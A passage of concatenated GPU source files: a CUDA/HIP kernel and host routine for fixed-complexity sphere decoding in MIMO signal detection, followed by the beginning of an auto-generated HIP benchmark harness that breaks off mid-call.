switch(count2) { case 0: distance[count2]=sqrt(powf(s_temp[tid].x-(-d),2)+pow(s_temp[tid].y-0,2)); break; case 1: distance[count2]=sqrt(powf(s_temp[tid].x-0,2)+pow(s_temp[tid].y-(-d),2)); break; case 2: distance[count2]=sqrt(pow(s_temp[tid].x-(d),2)+pow(s_temp[tid].y-0,2)); break; case 3: distance[count2]=sqrt(pow(s_temp[tid].x-0,2)+pow(s_temp[tid].y-d,2)); break; default: #if __CUDA_ARCH__ >=300 printf("result error code %d\n", error); #endif break; } } float mini_distance; int mini_index; mini_distance=distance[0]; mini_index=1; for(count3=0;count3<M;count3++) { if(distance[count3]<mini_distance) { mini_distance=distance[count3]; mini_index=count3+1; } } switch (mini_index) { case 1: s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=-d; s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=0; break; case 2: s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=0; s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=-d; break; case 3: s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=d; s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=0; break; case 4: s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=0; s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=d; break; default: #if __CUDA_ARCH__ >=300 printf("result error code %d\n", error); #endif } free(distance); free(result); } else if(M==16) //16QAM { d=sqrt(float(3)/(2* (float)(Nt*(M-1)))); if(s_temp[tid].x<(-2*d)) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=(-3*d); } else if(s_temp[tid].x>(2*d)) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=(3*d); } else if(s_temp[tid].x>=0&&s_temp[tid].x<=2*d) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=d; } else if(s_temp[tid].x>=(-2*d)&&s_temp[tid].x<=0) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=(-d); } if(s_temp[tid].y<(-2*d)) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=(-3*d); } else if(s_temp[tid].y>(2*d)) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=(3*d); } else if(s_temp[tid].y>=0&&s_temp[tid].y<=(2*d)) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=d; } else if(s_temp[tid].y>=(-2*d)&&s_temp[tid].y<=0) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=(-d); } } else if(M==64) //64QAM { d=sqrt(3/(2* (float)(Nt*(M-1)))); } } else { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)]=d_psymbolconstellation[s_sub_index[IDC2D((Nt-count1-1),(index*blockNum*threadNum+tx),pathNum)]]; __syncthreads(); } R_Eu_share[count1]=complex_sub( s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)],d_constant_shat[count1]); Eu_norm_share[tid]=beta; #pragma unroll for(count3=count1;count3<MATRIX_SIZE;count3++) { Eu_norm_share[tid]=complex_add(Eu_norm_share[tid],complex_mulcom(d_R[IDC2D(count1,count3,MATRIX_SIZE)],R_Eu_share[count3])); } Eu[(index*blockNum*threadNum+tx)]=Eu[(index*blockNum*threadNum+tx)]+pow(Eu_norm_share[tid].x,2)+pow(Eu_norm_share[tid].y,2); } __syncthreads(); free(R_Eu_share); } //host void FCSD_decoding( hipComplex *R, //upper triangular matrix after cholesky factorization store in device side // hipComplex *s_sub, //the sub brute force rho vector matrix hipComplex *d_s_hat, //unconstrained estimation of transmitted symbol vector s hipComplex *s_kernel, //quantization of estimation ,decoding results // hipComplex *Eu, //Euclidean distance int Nt, //the number of transmit antennas int Nr, //the number of receive antennas int M, //modulation scheme int *list, //the permutation list hipComplex *psymbolconstellation //the symbol constellation ) { //brute force search determine the vector results of the full expansion int rho=ceil(sqrt(Nt)-1); int count1,count2; // hipComplex *ss; // ss=(hipComplex*)malloc(MATRIX_SIZE*sizeof(hipComplex)); // hipComplex *s_sub; // s_sub=(hipComplex*)malloc(pow(M,rho)*rho*sizeof(hipComplex)); //all the possible full expansion sub vector int pathNum; pathNum=pow(M,rho); // int *d_s_sub_index; // int *s_sub_index=(int*)calloc(1,rho*pow(M,rho)*sizeof(int)); int *s_sub_index,*d_s_sub_index; hipHostMalloc((void**) &s_sub_index,rho*pathNum*sizeof(int),hipHostMallocDefault); fullfact(rho,M,s_sub_index); //get the indexes of all the possible rho length symbol vectors // int blockNum=BLOCK_NUM; //determined by the path number // int pathNum=pow(M,rho); //number of search path // int threadNum=ceil(pathNum/(blockNum*stride)); //determined by the path number float *Eu,*d_Eu; hipComplex *s_potential_matrix,*d_s_potential_matrix; // Eu=(float*)calloc(1,blockNum*sizeof(float)); hipHostMalloc((void**) &Eu,pathNum*sizeof(float),hipHostMallocDefault); hipHostMalloc((void**) &s_potential_matrix,MATRIX_SIZE*pathNum*sizeof(hipComplex),hipHostMallocDefault); // hipComplex *s_potential_matrix=(hipComplex*)calloc(1,pathNum*Nt*sizeof(hipComplex)); // hipComplex *s_hat=(hipComplex*)calloc(1,Nt*sizeof(hipComplex)); // hipComplex *d_s_potential_matrix; // hipMemcpy(s_hat,d_s_hat,Nt*sizeof(MATRIX_SIZE),hipMemcpyDeviceToHost); // int *j; // j=(int*)malloc(sizeof(int)); hipblasHandle_t handle; hipblasStatus_t ret; hipError_t error; size_t pitch_R,pitch_potential,pitch_index; ret=hipblasCreate(&handle); // error=hipMalloc((void**) &d_R, MATRIX_SIZE*MATRIX_SIZE*sizeof(hipComplex)); error=hipMalloc((void**) &d_s_sub_index, rho*pathNum*sizeof(int)); error=hipMalloc((void**) &d_s_potential_matrix, pathNum*Nt*sizeof(hipComplex)); hipMemset(d_s_potential_matrix,0,pathNum*Nt*sizeof(hipComplex)); // error=hipMalloc((void**) &d_list, MATRIX_SIZE*sizeof(int)); error=hipMalloc((void**) &d_Eu, pathNum*sizeof(float)); // error=hipMalloc((void**) &d_psymbolconstellation, M*sizeof(hipComplex)); clock_t start, end; start=clock(); // hipComplex *R_constant=(hipComplex*)calloc(1,MATRIX_SIZE*MATRIX_SIZE*sizeof(hipComplex)); hipMemcpyToSymbol(d_R, R, MATRIX_SIZE*MATRIX_SIZE*sizeof(hipComplex),0,hipMemcpyHostToDevice); printf("%s\n",hipGetErrorString(hipGetLastError())); hipMemcpyToSymbol(d_psymbolconstellation, psymbolconstellation, M*sizeof(hipComplex),0,hipMemcpyHostToDevice); printf("%s\n",hipGetErrorString(hipGetLastError())); hipMemcpyToSymbol(d_constant_shat, d_s_hat, MATRIX_SIZE*sizeof(hipComplex),0,hipMemcpyDeviceToDevice); printf("%s\n",hipGetErrorString(hipGetLastError())); hipMemcpyToSymbol(d_list, list, MATRIX_SIZE*sizeof(int),0,hipMemcpyHostToDevice); printf("%s\n",hipGetErrorString(hipGetLastError())); // error=hipMemcpy(d_R,R,MATRIX_SIZE*MATRIX_SIZE*sizeof(hipComplex),hipMemcpyDeviceToDevice); // error=hipMemcpy(d_psymbolconstellation, psymbolconstellation, M*sizeof(hipComplex),hipMemcpyHostToDevice); // error=hipMemcpy(d_s_sub_index, s_sub_index,rho*pathNum*sizeof(int),hipMemcpyHostToDevice); // error=hipMemcpy(d_list, list, Nt*(sizeof(int)),hipMemcpyHostToDevice); int sharedMem; sharedMem=1*sizeof(hipComplex); float duration; for(count1=0;count1<stride;count1++) { hipMemcpyAsync(d_s_sub_index,s_sub_index,rho*(pathNum)*sizeof(int),hipMemcpyHostToDevice,0); // hipMemcpyAsync(s_potential_matrix,d_s_potential_matrix,MATRIX_SIZE*(pathNum)*sizeof(hipComplex),hipMemcpyHostToDevice,0); hipLaunchKernelGGL(( FEpath), dim3(blockNum), dim3(threadNum),sharedMem, 0, d_s_potential_matrix,d_s_sub_index,rho,pathNum, d_Eu, M,count1); // error=hipDeviceSynchronize(); printf("%s\n",hipGetErrorString(hipGetLastError())); hipMemcpyAsync(s_potential_matrix,d_s_potential_matrix,MATRIX_SIZE*(pathNum)*sizeof(hipComplex),hipMemcpyDeviceToHost,0); hipMemcpyAsync(Eu,d_Eu,(pathNum)*sizeof(float),hipMemcpyDeviceToHost,0); } // error=hipMemcpy(s_potential_matrix,d_s_potential_matrix, Nt*sizeof(hipComplex)*pathNum,hipMemcpyDeviceToHost); end=clock(); // hipProfilerStop(); duration=double(end-start); printf("hey %0.4f ", duration); printf("\n"); // memcpy(Eu+0,Eu1,pathNum*sizeof(float)); // memcpy(Eu+pathNum,Eu2,pathNum*sizeof(float)); // memcpy(Eu+pathNum/2,Eu3,pathNum*sizeof(float)); // memcpy(Eu+(pathNum*3)/4,Eu4,pathNum*sizeof(float)); // printf("Eu_num is %d", Eu_num); // error=hipMemcpy(s_potential_matrix,d_s_potential_matrix,pathNum*Nt*sizeof(hipComplex),hipMemcpyDeviceToHost); // printf("all the potential symbol vector is:\n"); // for(count1=0;count1<pathNum;count1++) // { // for(int count2=0;count2<Nt;count2++) // { // printf("%0.4f%+0.4fi ", s_potential_matrix[IDC2D(count1,count2,Nt)].x,s_potential_matrix[IDC2D(count1,count2,Nt)].y); // } // printf("\n"); // } // error=hipMemcpy(R,d_R,Nt*Nt*sizeof(hipComplex),hipMemcpyDeviceToHost); // printf("the test upper triangular matrix in kernel is:\n"); // for(count1=0;count1<Nt;count1++) // { // for(int count2=0;count2<Nt;count2++) // { // printf("%0.4f%+0.4fi ", R[IDC2D(count1,count2,Nt)].x,R[IDC2D(count1,count2,Nt)].y); // } // printf("\n"); // } // error=hipMemcpy(Eu,d_Eu,pathNum*sizeof(float),hipMemcpyDeviceToHost); // if(error!=hipSuccess) // { //// printf("Eu returned error code %d, line %d\n", error, __LINE__); //// exit(EXIT_FAILURE); // } //fine out the symbol vector index among all the block output Euclidean distance // int Eu_mini_index=0; // float Eu_mini_value=Eu[0]; // for(count1=0;count1<pathNum;count1++) // { // if(Eu[count1]<Eu_mini_value) // { // Eu_mini_value=Eu[count1]; // Eu_mini_index=count1; // } // } int *Eu_mini_index=(int*)malloc(sizeof(int)); hipblasIsamin(handle,pathNum,d_Eu,1,Eu_mini_index); for(count1=0;count1<Nt;count1++) { s_kernel[list[count1]-1]=s_potential_matrix[IDC2D((MATRIX_SIZE-count1-1),(*Eu_mini_index-1),pathNum)]; } // for(int count2=0;count2<MATRIX_SIZE;count2++) // { // printf("%0.4f%+0.4f ", s_share_matrix[IDC2D(count1,count2,MATRIX_SIZE)].x, s_share_matrix[IDC2D(count1,count2,MATRIX_SIZE)].y); // } // printf("\n"); // } // error=hipMemcpy(s_hat,d_s_hat,Nt*sizeof(hipComplex),hipMemcpyDeviceToHost); // for(count1=0;count1<pathNum;count1++) // { // printf("the unconstrained estimation is:\n"); // for(int count2=0;count2<MATRIX_SIZE;count2++) // { // printf("%0.4f%+0.4fi ", s_hat[count2].x, s_hat[count2].y); // } // printf("\n"); // } printf("the s_kernel is :\n"); for(count1=0;count1<Nt;count1++) { printf("%0.4f%+0.4fi ", s_kernel[count1].x, s_kernel[count1].y); } printf("\n"); hipHostFree(s_sub_index); hipFree(d_s_sub_index); // hipFree(d_list); hipHostFree(Eu); hipFree(d_Eu); hipHostFree(s_potential_matrix); hipFree(d_s_potential_matrix); // hipFree(d_psymbolconstellation); free(Eu_mini_index); // hipFree(d_R); }
3e8132cbe7e75844f0c390f68c2bb39b08983e2b.cu
/* * * Copyright 1993-2012 NVIDIA Corporation. All rights reserved. * * Please refer to the NVIDIA end user license agreement (EULA) associated * with this source code for terms and conditions that govern your use of * this software. Any use, reproduction, disclosure, or distribution of * this software and related documentation outside the terms of the EULA * is strictly prohibited. */ /* * this function implement fixed complexity sphere decoding * INPUT: * y: received signal * H: permuted propagation matrix * M: modulation scheme, (2: BPSK 4: QPSK, 16: 16QAM, 64: 64QAM) * psymbolconstellation: the symbol constellation * OUTPUT: * s: detection result * Eu: Euclidean distance */ #include <stdio.h> #include <stdlib.h> #include<cuComplex.h> #include <string.h> #include<math.h> #include<cuda_runtime.h> #include<cuda.h> #include<cublas_v2.h> #include<time.h> #include"cu_complex_operation.cuh" #include"common.h" #include<cuda_runtime.h> #include<cuda.h> #include<cudaProfiler.h> #include<cuda_profiler_api.h> #include<device_functions.h> #define threadNum 1024 #define blockNum 4 #define stride 1 /* * in this version I applied colesced memory accesss to all the vector and matrix, with all the matrix stored in row major different threads reading one column * with all the matrix stored in column major, different threads reading one row * uitilize consecutive computation power */ __constant__ cuComplex d_R[MATRIX_SIZE*MATRIX_SIZE],d_psymbolconstellation[16],d_constant_shat[MATRIX_SIZE]; __constant__ int d_list[MATRIX_SIZE]; __global__ void FEpath( // cuComplex *d_R, //upper triangular matrix after cholesky factorization // cuComplex *d_constant_shat, //unconstrained estimation of transmitted symbol vector s // cuComplex *s_matrix_share, cuComplex *s_potential_matrix, //the matrix use to store all the solution candidates from all the blocks int *s_sub_index, //full factorial index matrix int rho, int pathNum, // cuComplex *s, //decoding results float *Eu, //Euclidean distance // int pitch_R, //the number of transmit antennas // int pitch_index, //the number of receive antennas // int pitch_p, int M, //modulation scheme // int threadNum, //number of threads // int *d_list, //the permutation list // cuComplex *d_psymbolconstellation, int index ) { //need to consider the resource allocation int tx=blockIdx.x*blockDim.x+threadIdx.x; //if the path number is small we can allocate the kernel into one block so that we can use the shared memory int tid=threadIdx.x; int Nt=MATRIX_SIZE; //allocate shared memory // extern __shared__ cuComplex array[]; error_t error; int count1, count2,count3,count4; __shared__ float d; //the minimum distance unit between the signal constellation, the distance is usually 2d __shared__ cuComplex alpha, beta; alpha.x=1;alpha.y=0; beta.x=0; beta.y=0; // __shared__ cuComplex d_constant_shat[MATRIX_SIZE]; // __shared__ cuComplex d_R[MATRIX_SIZE*MATRIX_SIZE]; __shared__ cuComplex s_temp[threadNum]; // cuComplex s_temp[tid]; // cuComplex Eu_norm_share[tid]; __shared__ cuComplex Eu_norm_share[threadNum]; cuComplex *R_Eu_share=(cuComplex*)malloc(Nt*sizeof(cuComplex)); // if(tid>=0&&tid<MATRIX_SIZE) // { // // for(count1=0;count1<MATRIX_SIZE;count1++) // { // d_R[IDC2D(count1,tid,MATRIX_SIZE)]=d_R[IDC2D(count1,tid,MATRIX_SIZE)]; // } // // // d_constant_shat[tid]=d_constant_shat[tid]; // } // __syncthreads(); Eu[blockNum*threadNum*index+tx]=0; for (count1=Nt-1; count1>=0; count1--) { if (count1<Nt-rho) { s_temp[tid]=d_constant_shat[count1]; #pragma unroll for (count2=count1+1;count2<Nt; count2++) { s_temp[tid]=complex_add(s_temp[tid],complex_mulcom(complex_div(d_R[IDC2D(count1,count2,MATRIX_SIZE)],d_R[IDC2D(count1,count1,MATRIX_SIZE)]),(complex_sub(d_constant_shat[count2],s_potential_matrix[IDC2D(count2,(index*blockNum*threadNum+tx),pathNum)])))); } if(M==2) //BPSK { d=sqrt(float(float(1)/float(Nt))); if(s_temp[tid].x>0) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=d; s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=0; } else { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=(-d); s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=0; } } else if(M==4) //QPSK { int *result=(int*)malloc(sizeof(int)); memset(result,0,sizeof(int)); float *distance=(float*)malloc(M*sizeof(float)); memset(distance,0,M*sizeof(int)); d=sqrt(float(float(1)/float(Nt))); for(count2=0;count2<M;count2++) { switch(count2) { case 0: distance[count2]=sqrt(powf(s_temp[tid].x-(-d),2)+pow(s_temp[tid].y-0,2)); break; case 1: distance[count2]=sqrt(powf(s_temp[tid].x-0,2)+pow(s_temp[tid].y-(-d),2)); break; case 2: distance[count2]=sqrt(pow(s_temp[tid].x-(d),2)+pow(s_temp[tid].y-0,2)); break; case 3: distance[count2]=sqrt(pow(s_temp[tid].x-0,2)+pow(s_temp[tid].y-d,2)); break; default: #if __CUDA_ARCH__ >=300 printf("result error code %d\n", error); #endif break; } } float mini_distance; int mini_index; mini_distance=distance[0]; mini_index=1; for(count3=0;count3<M;count3++) { if(distance[count3]<mini_distance) { mini_distance=distance[count3]; mini_index=count3+1; } } switch (mini_index) { case 1: s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=-d; s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=0; break; case 2: s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=0; s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=-d; break; case 3: s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=d; s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=0; break; case 4: s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=0; s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=d; break; default: #if __CUDA_ARCH__ >=300 printf("result error code %d\n", error); #endif } free(distance); free(result); } else if(M==16) //16QAM { d=sqrt(float(3)/(2* (float)(Nt*(M-1)))); if(s_temp[tid].x<(-2*d)) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=(-3*d); } else if(s_temp[tid].x>(2*d)) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=(3*d); } else if(s_temp[tid].x>=0&&s_temp[tid].x<=2*d) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=d; } else if(s_temp[tid].x>=(-2*d)&&s_temp[tid].x<=0) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].x=(-d); } if(s_temp[tid].y<(-2*d)) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=(-3*d); } else if(s_temp[tid].y>(2*d)) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=(3*d); } else if(s_temp[tid].y>=0&&s_temp[tid].y<=(2*d)) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=d; } else if(s_temp[tid].y>=(-2*d)&&s_temp[tid].y<=0) { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)].y=(-d); } } else if(M==64) //64QAM { d=sqrt(3/(2* (float)(Nt*(M-1)))); } } else { s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)]=d_psymbolconstellation[s_sub_index[IDC2D((Nt-count1-1),(index*blockNum*threadNum+tx),pathNum)]]; __syncthreads(); } R_Eu_share[count1]=complex_sub( s_potential_matrix[IDC2D(count1,(index*blockNum*threadNum+tx),pathNum)],d_constant_shat[count1]); Eu_norm_share[tid]=beta; #pragma unroll for(count3=count1;count3<MATRIX_SIZE;count3++) { Eu_norm_share[tid]=complex_add(Eu_norm_share[tid],complex_mulcom(d_R[IDC2D(count1,count3,MATRIX_SIZE)],R_Eu_share[count3])); } Eu[(index*blockNum*threadNum+tx)]=Eu[(index*blockNum*threadNum+tx)]+pow(Eu_norm_share[tid].x,2)+pow(Eu_norm_share[tid].y,2); } __syncthreads(); free(R_Eu_share); } //host void FCSD_decoding( cuComplex *R, //upper triangular matrix after cholesky factorization store in device side // cuComplex *s_sub, //the sub brute force rho vector matrix cuComplex *d_s_hat, //unconstrained estimation of transmitted symbol vector s cuComplex *s_kernel, //quantization of estimation ,decoding results // cuComplex *Eu, //Euclidean distance int Nt, //the number of transmit antennas int Nr, //the number of receive antennas int M, //modulation scheme int *list, //the permutation list cuComplex *psymbolconstellation //the symbol constellation ) { //brute force search determine the vector results of the full expansion int rho=ceil(sqrt(Nt)-1); int count1,count2; // cuComplex *ss; // ss=(cuComplex*)malloc(MATRIX_SIZE*sizeof(cuComplex)); // cuComplex *s_sub; // s_sub=(cuComplex*)malloc(pow(M,rho)*rho*sizeof(cuComplex)); //all the possible full expansion sub vector int pathNum; pathNum=pow(M,rho); // int *d_s_sub_index; // int *s_sub_index=(int*)calloc(1,rho*pow(M,rho)*sizeof(int)); int *s_sub_index,*d_s_sub_index; cudaHostAlloc((void**) &s_sub_index,rho*pathNum*sizeof(int),cudaHostAllocDefault); fullfact(rho,M,s_sub_index); //get the indexes of all the possible rho length symbol vectors // int blockNum=BLOCK_NUM; //determined by the path number // int pathNum=pow(M,rho); //number of search path // int threadNum=ceil(pathNum/(blockNum*stride)); //determined by the path number float *Eu,*d_Eu; cuComplex *s_potential_matrix,*d_s_potential_matrix; // Eu=(float*)calloc(1,blockNum*sizeof(float)); cudaHostAlloc((void**) &Eu,pathNum*sizeof(float),cudaHostAllocDefault); cudaHostAlloc((void**) &s_potential_matrix,MATRIX_SIZE*pathNum*sizeof(cuComplex),cudaHostAllocDefault); // cuComplex *s_potential_matrix=(cuComplex*)calloc(1,pathNum*Nt*sizeof(cuComplex)); // cuComplex *s_hat=(cuComplex*)calloc(1,Nt*sizeof(cuComplex)); // cuComplex *d_s_potential_matrix; // cudaMemcpy(s_hat,d_s_hat,Nt*sizeof(MATRIX_SIZE),cudaMemcpyDeviceToHost); // int *j; // j=(int*)malloc(sizeof(int)); cublasHandle_t handle; cublasStatus_t ret; cudaError_t error; size_t pitch_R,pitch_potential,pitch_index; ret=cublasCreate(&handle); // error=cudaMalloc((void**) &d_R, MATRIX_SIZE*MATRIX_SIZE*sizeof(cuComplex)); error=cudaMalloc((void**) &d_s_sub_index, rho*pathNum*sizeof(int)); error=cudaMalloc((void**) &d_s_potential_matrix, pathNum*Nt*sizeof(cuComplex)); cudaMemset(d_s_potential_matrix,0,pathNum*Nt*sizeof(cuComplex)); // error=cudaMalloc((void**) &d_list, MATRIX_SIZE*sizeof(int)); error=cudaMalloc((void**) &d_Eu, pathNum*sizeof(float)); // error=cudaMalloc((void**) &d_psymbolconstellation, M*sizeof(cuComplex)); clock_t start, end; start=clock(); // cuComplex *R_constant=(cuComplex*)calloc(1,MATRIX_SIZE*MATRIX_SIZE*sizeof(cuComplex)); cudaMemcpyToSymbol(d_R, R, MATRIX_SIZE*MATRIX_SIZE*sizeof(cuComplex),0,cudaMemcpyHostToDevice); printf("%s\n",cudaGetErrorString(cudaGetLastError())); cudaMemcpyToSymbol(d_psymbolconstellation, psymbolconstellation, M*sizeof(cuComplex),0,cudaMemcpyHostToDevice); printf("%s\n",cudaGetErrorString(cudaGetLastError())); cudaMemcpyToSymbol(d_constant_shat, d_s_hat, MATRIX_SIZE*sizeof(cuComplex),0,cudaMemcpyDeviceToDevice); printf("%s\n",cudaGetErrorString(cudaGetLastError())); cudaMemcpyToSymbol(d_list, list, MATRIX_SIZE*sizeof(int),0,cudaMemcpyHostToDevice); printf("%s\n",cudaGetErrorString(cudaGetLastError())); // error=cudaMemcpy(d_R,R,MATRIX_SIZE*MATRIX_SIZE*sizeof(cuComplex),cudaMemcpyDeviceToDevice); // error=cudaMemcpy(d_psymbolconstellation, psymbolconstellation, M*sizeof(cuComplex),cudaMemcpyHostToDevice); // error=cudaMemcpy(d_s_sub_index, s_sub_index,rho*pathNum*sizeof(int),cudaMemcpyHostToDevice); // error=cudaMemcpy(d_list, list, Nt*(sizeof(int)),cudaMemcpyHostToDevice); int sharedMem; sharedMem=1*sizeof(cuComplex); float duration; for(count1=0;count1<stride;count1++) { cudaMemcpyAsync(d_s_sub_index,s_sub_index,rho*(pathNum)*sizeof(int),cudaMemcpyHostToDevice,0); // cudaMemcpyAsync(s_potential_matrix,d_s_potential_matrix,MATRIX_SIZE*(pathNum)*sizeof(cuComplex),cudaMemcpyHostToDevice,0); FEpath<<<blockNum, threadNum,sharedMem>>>(d_s_potential_matrix,d_s_sub_index,rho,pathNum, d_Eu, M,count1); // error=cudaDeviceSynchronize(); printf("%s\n",cudaGetErrorString(cudaGetLastError())); cudaMemcpyAsync(s_potential_matrix,d_s_potential_matrix,MATRIX_SIZE*(pathNum)*sizeof(cuComplex),cudaMemcpyDeviceToHost,0); cudaMemcpyAsync(Eu,d_Eu,(pathNum)*sizeof(float),cudaMemcpyDeviceToHost,0); } // error=cudaMemcpy(s_potential_matrix,d_s_potential_matrix, Nt*sizeof(cuComplex)*pathNum,cudaMemcpyDeviceToHost); end=clock(); // cudaProfilerStop(); duration=double(end-start); printf("hey %0.4f ", duration); printf("\n"); // memcpy(Eu+0,Eu1,pathNum*sizeof(float)); // memcpy(Eu+pathNum,Eu2,pathNum*sizeof(float)); // memcpy(Eu+pathNum/2,Eu3,pathNum*sizeof(float)); // memcpy(Eu+(pathNum*3)/4,Eu4,pathNum*sizeof(float)); // printf("Eu_num is %d", Eu_num); // error=cudaMemcpy(s_potential_matrix,d_s_potential_matrix,pathNum*Nt*sizeof(cuComplex),cudaMemcpyDeviceToHost); // printf("all the potential symbol vector is:\n"); // for(count1=0;count1<pathNum;count1++) // { // for(int count2=0;count2<Nt;count2++) // { // printf("%0.4f%+0.4fi ", s_potential_matrix[IDC2D(count1,count2,Nt)].x,s_potential_matrix[IDC2D(count1,count2,Nt)].y); // } // printf("\n"); // } // error=cudaMemcpy(R,d_R,Nt*Nt*sizeof(cuComplex),cudaMemcpyDeviceToHost); // printf("the test upper triangular matrix in kernel is:\n"); // for(count1=0;count1<Nt;count1++) // { // for(int count2=0;count2<Nt;count2++) // { // printf("%0.4f%+0.4fi ", R[IDC2D(count1,count2,Nt)].x,R[IDC2D(count1,count2,Nt)].y); // } // printf("\n"); // } // error=cudaMemcpy(Eu,d_Eu,pathNum*sizeof(float),cudaMemcpyDeviceToHost); // if(error!=cudaSuccess) // { //// printf("Eu returned error code %d, line %d\n", error, __LINE__); //// exit(EXIT_FAILURE); // } //fine out the symbol vector index among all the block output Euclidean distance // int Eu_mini_index=0; // float Eu_mini_value=Eu[0]; // for(count1=0;count1<pathNum;count1++) // { // if(Eu[count1]<Eu_mini_value) // { // Eu_mini_value=Eu[count1]; // Eu_mini_index=count1; // } // } int *Eu_mini_index=(int*)malloc(sizeof(int)); cublasIsamin(handle,pathNum,d_Eu,1,Eu_mini_index); for(count1=0;count1<Nt;count1++) { s_kernel[list[count1]-1]=s_potential_matrix[IDC2D((MATRIX_SIZE-count1-1),(*Eu_mini_index-1),pathNum)]; } // for(int count2=0;count2<MATRIX_SIZE;count2++) // { // printf("%0.4f%+0.4f ", s_share_matrix[IDC2D(count1,count2,MATRIX_SIZE)].x, s_share_matrix[IDC2D(count1,count2,MATRIX_SIZE)].y); // } // printf("\n"); // } // error=cudaMemcpy(s_hat,d_s_hat,Nt*sizeof(cuComplex),cudaMemcpyDeviceToHost); // for(count1=0;count1<pathNum;count1++) // { // printf("the unconstrained estimation is:\n"); // for(int count2=0;count2<MATRIX_SIZE;count2++) // { // printf("%0.4f%+0.4fi ", s_hat[count2].x, s_hat[count2].y); // } // printf("\n"); // } printf("the s_kernel is :\n"); for(count1=0;count1<Nt;count1++) { printf("%0.4f%+0.4fi ", s_kernel[count1].x, s_kernel[count1].y); } printf("\n"); cudaFreeHost(s_sub_index); cudaFree(d_s_sub_index); // cudaFree(d_list); cudaFreeHost(Eu); cudaFree(d_Eu); cudaFreeHost(s_potential_matrix); cudaFree(d_s_potential_matrix); // cudaFree(d_psymbolconstellation); free(Eu_mini_index); // cudaFree(d_R); }
7e894159984ba9b466baaae8280d22a4b94c4862.hip
// !!! This is a file automatically generated by hipify!!! #include <stdbool.h> #include <stdio.h> #include <string.h> #include <getopt.h> #include <hiprand/hiprand_kernel.h> #include <stdlib.h> #include <hip/hip_runtime.h> #include <sys/time.h> #include "ConditionCFLKernel2D3.cu" #include<chrono> #include<iostream> using namespace std; using namespace std::chrono; int blocks_[20][2] = {{8,8},{16,16},{24,24},{32,32},{1,64},{1,128},{1,192},{1,256},{1,320},{1,384},{1,448},{1,512},{1,576},{1,640},{1,704},{1,768},{1,832},{1,896},{1,960},{1,1024}}; int matrices_[7][2] = {{240,240},{496,496},{784,784},{1016,1016},{1232,1232},{1680,1680},{2024,2024}}; int main(int argc, char **argv) { hipSetDevice(0); char* p;int matrix_len=strtol(argv[1], &p, 10); for(int matrix_looper=0;matrix_looper<matrix_len;matrix_looper++){ for(int block_looper=0;block_looper<20;block_looper++){ int XSIZE=matrices_[matrix_looper][0],YSIZE=matrices_[matrix_looper][1],BLOCKX=blocks_[block_looper][0],BLOCKY=blocks_[block_looper][1]; double *newDT = NULL; hipMalloc(&newDT, XSIZE*YSIZE); double *DT2D = NULL; hipMalloc(&DT2D, XSIZE*YSIZE); double *DT1D = NULL; hipMalloc(&DT1D, XSIZE*YSIZE); double *Vmoy = NULL; hipMalloc(&Vmoy, XSIZE*YSIZE); double *invRmed = NULL; hipMalloc(&invRmed, XSIZE*YSIZE); int *CFL = NULL; hipMalloc(&CFL, XSIZE*YSIZE); int nsec = 1; int nrad = 1; double DeltaT = 1; int iXSIZE= XSIZE; int iYSIZE= YSIZE; while(iXSIZE%BLOCKX!=0) { iXSIZE++; } while(iYSIZE%BLOCKY!=0) { iYSIZE++; } dim3 gridBlock(iXSIZE/BLOCKX, iYSIZE/BLOCKY); dim3 threadBlock(BLOCKX, BLOCKY); hipFree(0);hipLaunchKernelGGL(( ConditionCFLKernel2D3), dim3(gridBlock),dim3(threadBlock), 0, 0, 